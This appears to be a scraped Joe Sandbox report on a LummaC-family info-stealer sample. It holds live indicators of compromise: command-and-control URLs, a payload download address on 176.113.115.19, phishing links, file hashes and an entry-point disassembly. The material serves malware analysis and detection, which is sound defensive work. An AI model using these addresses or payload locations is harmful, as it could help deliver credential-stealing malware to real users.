                                                      https://skidjazzyric.click/apiXxZ9NjAAA=BF85.tmp.exe, 00000003.00000002.2394282127.0000000002F15000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2351282568.0000000002F15000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2331967620.0000000002F12000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2335322114.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2349406534.0000000002F15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://skidjazzyric.click:443/api:BF85.tmp.exe, 00000003.00000003.2320717496.0000000002E65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      104.21.56.70
                                                      post-to-me.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      104.21.64.1
                                                      skidjazzyric.clickUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      176.113.115.19
                                                      unknownRussian Federation
                                                      49505SELECTELRUfalse
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1586500
                                                      Start date and time:2025-01-09 08:32:28 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 36s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:9
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Ljrprfl3BH.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:ab03119a9a5959898463ff872c49935d.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@4/7@2/3
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 93%
                                                      • Number of executed functions: 44
                                                      • Number of non-executed functions: 332
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 20.189.173.21, 13.107.253.45, 20.12.23.50, 40.126.32.134
                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      TimeTypeDescription
                                                      02:33:34API Interceptor9423849x Sleep call for process: Ljrprfl3BH.exe modified
                                                      02:33:38API Interceptor5x Sleep call for process: BF85.tmp.exe modified
                                                      02:33:48API Interceptor1x Sleep call for process: WerFault.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      104.21.56.70chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                        xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                          K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                            IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                              J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                  DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                    he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                      AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                        rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                          104.21.64.1Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                          • ordrr.statementquo.com/QCbxA/
                                                                          SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                          • adsfirm.com/administrator/index.php
                                                                          PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                          • www.bser101pp.buzz/v89f/
                                                                          176.113.115.19chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                          • 176.113.115.19/ScreenUpdateSync.exe
                                                                          xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                          • 176.113.115.19/ScreenUpdateSync.exe
                                                                          K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                          • 176.113.115.19/ScreenUpdateSync.exe
                                                                          IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                          • 176.113.115.19/ScreenUpdateSync.exe
                                                                          J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                          • 176.113.115.19/ScreenUpdateSync.exe
                                                                          TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                          • 176.113.115.19/ScreenUpdateSync.exe
                                                                          sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                          • 176.113.115.19/ScreenUpdateSync.exe
                                                                          InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                          • 176.113.115.19/ScreenUpdateSync.exe
                                                                          hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                          • 176.113.115.19/ScreenUpdateSync.exe
                                                                          DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                          • 176.113.115.19/ScreenUpdateSync.exe
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          post-to-me.comchu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.56.70
                                                                          xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.56.70
                                                                          K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.56.70
                                                                          IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.56.70
                                                                          J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.56.70
                                                                          TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                          • 172.67.179.207
                                                                          sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                          • 172.67.179.207
                                                                          InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                          • 172.67.179.207
                                                                          hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.56.70
                                                                          DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.56.70
                                                                          skidjazzyric.clickDPlvBkg4aj.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.112.1
                                                                          chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.80.1
                                                                          xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.80.1
                                                                          GR7ShhQTKE.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.64.1
                                                                          ab89jay39E.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.64.1
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          CLOUDFLARENETUSSubscription_Renewal_Invoice_2025_FGHDCS.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 188.114.96.3
                                                                          PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.3
                                                                          DPlvBkg4aj.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.112.1
                                                                          https://qr.me-qr.com/PVhBu5SRGet hashmaliciousUnknownBrowse
                                                                          • 188.114.97.3
                                                                          http://join.grass-io.ccGet hashmaliciousUnknownBrowse
                                                                          • 104.18.18.237
                                                                          https://qr.me-qr.com/pt/E9k76ewGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.3
                                                                          watchdog.elfGet hashmaliciousXmrigBrowse
                                                                          • 1.1.1.1
                                                                          https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comGet hashmaliciousUnknownBrowse
                                                                          • 188.114.97.3
                                                                          https://rinderynitvye.blogspot.com/Get hashmaliciousCAPTCHA Scam ClickFix, PhisherBrowse
                                                                          • 188.114.97.3
                                                                          https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.3
                                                                          SELECTELRUchu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                          • 176.113.115.19
                                                                          xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                          • 176.113.115.19
                                                                          nYT1CaXH9N.ps1Get hashmaliciousAmadeyBrowse
                                                                          • 176.113.115.131
                                                                          iy2.dat.exeGet hashmaliciousXWormBrowse
                                                                          • 176.113.115.170
                                                                          z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                          • 82.148.27.5
                                                                          K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                          • 176.113.115.19
                                                                          IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                          • 176.113.115.19
                                                                          J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                          • 176.113.115.19
                                                                          176.113.115_1.170.ps1Get hashmaliciousXWormBrowse
                                                                          • 176.113.115.170
                                                                          botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                          • 178.132.202.249
                                                                          CLOUDFLARENETUSSubscription_Renewal_Invoice_2025_FGHDCS.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 188.114.96.3
                                                                          PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.3
                                                                          DPlvBkg4aj.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.112.1
                                                                          https://qr.me-qr.com/PVhBu5SRGet hashmaliciousUnknownBrowse
                                                                          • 188.114.97.3
                                                                          http://join.grass-io.ccGet hashmaliciousUnknownBrowse
                                                                          • 104.18.18.237
                                                                          https://qr.me-qr.com/pt/E9k76ewGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.3
                                                                          watchdog.elfGet hashmaliciousXmrigBrowse
                                                                          • 1.1.1.1
                                                                          https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comGet hashmaliciousUnknownBrowse
                                                                          • 188.114.97.3
                                                                          https://rinderynitvye.blogspot.com/Get hashmaliciousCAPTCHA Scam ClickFix, PhisherBrowse
                                                                          • 188.114.97.3
                                                                          https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.3
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          a0e9f5d64349fb13191bc781f81f42e1DPlvBkg4aj.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.64.1
                                                                          https://veryfast.io/?ap=adw&as=g_d_fast_in&dm%5Bads%5D=new_static&dm%5Btype%5D=dis&gad_source=5&gclid=EAIaIQobChMIgp352NzmigMVZAOzAB0wMA8oEAEYASAAEgI_hfD_BwEGet hashmaliciousUnknownBrowse
                                                                          • 104.21.64.1
                                                                          web55.mp4.htaGet hashmaliciousLummaCBrowse
                                                                          • 104.21.64.1
                                                                          Rgr8LJz.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.64.1
                                                                          random.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.64.1
                                                                          asd.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.64.1
                                                                          wRhEMj1swo.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.21.64.1
                                                                          chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.64.1
                                                                          xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.64.1
                                                                          37f463bf4616ecd445d4a1937da06e192362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                                          • 104.21.56.70
                                                                          2362476847-83854387.07.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.21.56.70
                                                                          2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                                                                          • 104.21.56.70
                                                                          2o63254452-763487230.06.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.21.56.70
                                                                          https://veryfast.io/?ap=adw&as=g_d_fast_in&dm%5Bads%5D=new_static&dm%5Btype%5D=dis&gad_source=5&gclid=EAIaIQobChMIgp352NzmigMVZAOzAB0wMA8oEAEYASAAEgI_hfD_BwEGet hashmaliciousUnknownBrowse
                                                                          • 104.21.56.70
                                                                          z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 104.21.56.70
                                                                          HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • 104.21.56.70
                                                                          D7VRkhOECq.exeGet hashmaliciousGuLoaderBrowse
                                                                          • 104.21.56.70
                                                                          KO0q4biYfC.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 104.21.56.70
                                                                          No context
                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):65536
                                                                          Entropy (8bit):1.0606024993116983
                                                                          Encrypted:false
                                                                          SSDEEP:192:HhvKJoBS0B1TXGjsFmFizuiFcEZ24IO8R:QJoBZB1TXGjDizuiFcEY4IO8R
                                                                          MD5:64BE8568C1BC5A861BB1270BA19D31FF
                                                                          SHA1:6BFD545EA81CAE82E0AEADD1EE9340DF86D44328
                                                                          SHA-256:50BD7D9B0F0E3D3CEB4C1308BC312D6F9D9B54EEB26D9F6480B5DE662C649E68
                                                                          SHA-512:97A7B6A7BB86C093A1D016525E92A7F6F8076792088F11A3E5D34512CCC47FB8FE6712D1264990E5765A3BC19D7E8608ABC4481C7831E596EEAEEDF046830B5E
                                                                          Malicious:true
                                                                          Reputation:low
                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.8.1.6.2.4.9.1.5.2.0.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.8.1.6.2.5.8.8.3.9.5.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.a.2.9.f.9.d.-.8.b.d.d.-.4.9.9.6.-.b.f.3.b.-.5.c.0.2.4.5.7.d.5.f.3.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.d.b.7.d.e.f.-.c.e.7.f.-.4.2.e.3.-.8.f.d.e.-.b.d.f.d.e.a.0.f.9.1.a.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.F.8.5...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.0.c.-.0.0.0.1.-.0.0.1.5.-.f.2.9.6.-.e.b.c.a.6.8.6.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.6.b.7.a.f.e.e.4.1.0.2.e.7.4.6.a.7.2.f.6.b.4.b.c.f.3.a.7.d.2.d.0.0.0.0.4.2.0.7.!.0.0.0.0.0.9.7.8.4.c.6.e.0.c.0.e.2.b.e.3.6.c.8.3.f.4.1.5.3.5.9.0.8.0.3.9.f.e.1.a.a.3.4.3.!.B.F.8.5...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                          File Type:Mini DuMP crash report, 15 streams, Thu Jan 9 07:33:45 2025, 0x1205a4 type
                                                                          Category:dropped
                                                                          Size (bytes):109794
                                                                          Entropy (8bit):2.2086978775188513
                                                                          Encrypted:false
                                                                          SSDEEP:384:SA9r77BPu2GsR67wq+7XJZvri8KtLFso6Z2jKX2sWVwLF0yPFquIlVZBqkWFRj3G:SOn7BPu207f+bJc8KfsFR0iquGCZ/e
                                                                          MD5:7202EB6F98BF70F6DA5BD867FC32E528
                                                                          SHA1:7D420FD53C3CE3FE5E87AD1E54942DD966D09319
                                                                          SHA-256:2585B051F69CA3919EB26CF3EDABD3A398CF7E6D5355AFBA80C07D35AF8F01FE
                                                                          SHA-512:1B7C940F932FB4207EA222DE6683C86EFB81D3F7DDF36A9A5B77955D1F4F7F774E0AB4C639336C024B5D4F57A190951A51309D6705F5B857288BD8057020E843
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:MDMP..a..... ........{.g........................p...............h$......4....N..........`.......8...........T...........HE...g...........$...........&..............................................................................eJ......p'......GenuineIntel............T............{.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):8330
                                                                          Entropy (8bit):3.701612604902097
                                                                          Encrypted:false
                                                                          SSDEEP:192:R6l7wVeJ/h6LF+I6YBMA6ygmfJ2/LpDM89bZfsf2Tm:R6lXJZ6LFx6YBz6ygmfJ2/HZEfD
                                                                          MD5:66C9800A7B804C2118F53B71D38648BE
                                                                          SHA1:7311282C3E60AB87C266AF42F89CDB3D9F897E7F
                                                                          SHA-256:745A36299EF3DF87FCECF1159050BF1C6067F6424A9AA10C0CC578EE4565E4DF
                                                                          SHA-512:B9EB4001BC70D8C874247CA324DA8530B71762F6DF58BB973B4605253558B41571DD5F764C802F05873D84BF9E64FC481A017E67E1A75AAB72AB2BDF1AFD38A5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.2.8.<./.P.i.
                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):4613
                                                                          Entropy (8bit):4.483560811015181
                                                                          Encrypted:false
                                                                          SSDEEP:48:cvIwWl8zsXJg77aI9BDNEWpW8VYxFPYm8M4JpGOqFuz+q8U2O0yesIXd5d:uIjf5I7Xr7VAFSJ08cW0d5d
                                                                          MD5:B3C3871198598B71FC64F9B689185B31
                                                                          SHA1:5E2699E8DFCF64A277BD36112B39934874C2AC00
                                                                          SHA-256:C6329520A4BCE4EBC7D2FD61630A0909FAE8EF8CDE012C265057D92B0715B5A2
                                                                          SHA-512:92D6B0878F3396C2016E6A999938C858DF76657E91E0AB4DFDF1553602D095841E9D52EE65C7C547B5B67761E86F0DDA485F3F115A8BF9FA0D29024C49D67F07
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="668076" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                          Process:C:\Users\user\Desktop\Ljrprfl3BH.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):341504
                                                                          Entropy (8bit):7.257573629179284
                                                                          Encrypted:false
                                                                          SSDEEP:6144:imcwLfcraiOA/aX5CkSnVmB2ZHgZSgGf:ieDccA/Y5CkSn0gZgs
                                                                          MD5:D66791DB5C8D7BF392361E2343F7A5EA
                                                                          SHA1:09784C6E0C0E2BE36C83F41535908039FE1AA343
                                                                          SHA-256:25C2A9D961D4110C9E66519B777AA070BEEC2388278ADBD68454D537422BD895
                                                                          SHA-512:E936C1E158ADC60FD348C695C088F5FE6F1F16EA58DB6FE211EEC3A426320F40619D56A3B43F3755B1BC178FF7ED7541618A9BF030D4AB1D2505101412A38361
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Reputation:low
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.....k...k...k.......k....;.k.......k....d.k.9Q....k...j.m.k......k.......k.......k.Rich..k.........PE..L......e.................$...P.......^.......@....@.................................?........................................*..(.......h............................................................G..@...............t............................text...V#.......$.................. ..`.data.......@...`...(..............@....rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\Ljrprfl3BH.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):341504
                                                                          Entropy (8bit):7.257573629179284
                                                                          Encrypted:false
                                                                          SSDEEP:6144:imcwLfcraiOA/aX5CkSnVmB2ZHgZSgGf:ieDccA/Y5CkSn0gZgs
                                                                          MD5:D66791DB5C8D7BF392361E2343F7A5EA
                                                                          SHA1:09784C6E0C0E2BE36C83F41535908039FE1AA343
                                                                          SHA-256:25C2A9D961D4110C9E66519B777AA070BEEC2388278ADBD68454D537422BD895
                                                                          SHA-512:E936C1E158ADC60FD348C695C088F5FE6F1F16EA58DB6FE211EEC3A426320F40619D56A3B43F3755B1BC178FF7ED7541618A9BF030D4AB1D2505101412A38361
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Reputation:low
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.....k...k...k.......k....;.k.......k....d.k.9Q....k...j.m.k......k.......k.......k.Rich..k.........PE..L......e.................$...P.......^.......@....@.................................?........................................*..(.......h............................................................G..@...............t............................text...V#.......$.................. ..`.data.......@...`...(..............@....rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                          Category:dropped
                                                                          Size (bytes):1835008
                                                                          Entropy (8bit):4.468549935243497
                                                                          Encrypted:false
                                                                          SSDEEP:6144:OzZfpi6ceLPx9skLmb0fAZWSP3aJG8nAgeiJRMMhA2zX4WABluuNRjDH5SN:QZHtAZWOKnMM6bFpzj4N
                                                                          MD5:250B14A3B1AAE39EF3573B7012B79CEF
                                                                          SHA1:84AE3BC7535F992F06E4ABD2629ABBAEEDFF3E04
                                                                          SHA-256:E922CFFB5F65BC721862CC0A660105CAB6C11CF50C2767E36AFDADB50B3F27D5
                                                                          SHA-512:D884916D04A5568B47AEB596FF7313C778ED8BC327F0B13655B069886565CC33631C4F6199E04D94F4BE2B978AE044A74FFE490547BEEC30A90384E617A76282
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm>o-.hb...............................................................................................................................................................................................................................................................................................................................................g;.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):6.8094330810508445
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:Ljrprfl3BH.exe
                                                                          File size:503'808 bytes
                                                                          MD5:ab03119a9a5959898463ff872c49935d
                                                                          SHA1:c1abff218d0fbd0949441bee03257b042901de88
                                                                          SHA256:70a579f24a9f7013d5de627125f829b2ebb137586d3f293ff608cec606655e8b
                                                                          SHA512:512449982dcd8ab7a3db4acef97d9954af57f119cb01d2865f8771853224ddc92517207d1be82b2f5c050edd0c124a0afae9592af43000691795ba3293853a30
                                                                          SSDEEP:6144:YEnc0V9hJQVzRnd+xNXg00WVuoLmXcGbUpsSS5YlzUzuNhXT6n:YEnRV9fQNRap50WFCs8JYN6u
                                                                          TLSH:FDB49E12B2F93C18FEB74B318E2A95D8262FFDF14E74265D61147A9F08F29B1C522742
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A]p. 3#. 3#. 3#.r.#. 3#.r.#. 3#.r.#. 3#..H#. 3#. 2#. 3#.r.#. 3#.r.#. 3#.r.#. 3#Rich. 3#........PE..L......d.................$.
                                                                          Icon Hash:86c7c30b0f4e0d99
                                                                          Entrypoint:0x40164d
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x64B681BE [Tue Jul 18 12:12:46 2023 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:0
                                                                          File Version Major:5
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:becaef8603902ffcda8786c9e684de4c
                                                                          Instruction
                                                                          call 00007EFF1CB4968Ah
                                                                          jmp 00007EFF1CB4522Dh
                                                                          mov edi, edi
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          sub esp, 00000328h
                                                                          mov dword ptr [004588F8h], eax
                                                                          mov dword ptr [004588F4h], ecx
                                                                          mov dword ptr [004588F0h], edx
                                                                          mov dword ptr [004588ECh], ebx
                                                                          mov dword ptr [004588E8h], esi
                                                                          mov dword ptr [004588E4h], edi
                                                                          mov word ptr [00458910h], ss
                                                                          mov word ptr [00458904h], cs
                                                                          mov word ptr [004588E0h], ds
                                                                          mov word ptr [004588DCh], es
                                                                          mov word ptr [004588D8h], fs
                                                                          mov word ptr [004588D4h], gs
                                                                          pushfd
                                                                          pop dword ptr [00458908h]
                                                                          mov eax, dword ptr [ebp+00h]
